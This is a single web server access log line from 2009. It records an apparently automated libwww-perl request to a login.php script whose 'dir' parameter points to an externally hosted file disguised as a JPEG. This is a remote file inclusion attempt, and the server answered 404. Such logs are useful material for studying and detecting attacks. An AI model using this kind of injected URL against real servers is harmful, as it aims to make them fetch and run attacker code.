85.214.53.78 - - [15/Jan/2009:07:27:49 -0600] "GET /logs//login.php?dir=http://www.loft-im-hof.de//wp-content/myfotos/raeume/DSC00583.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
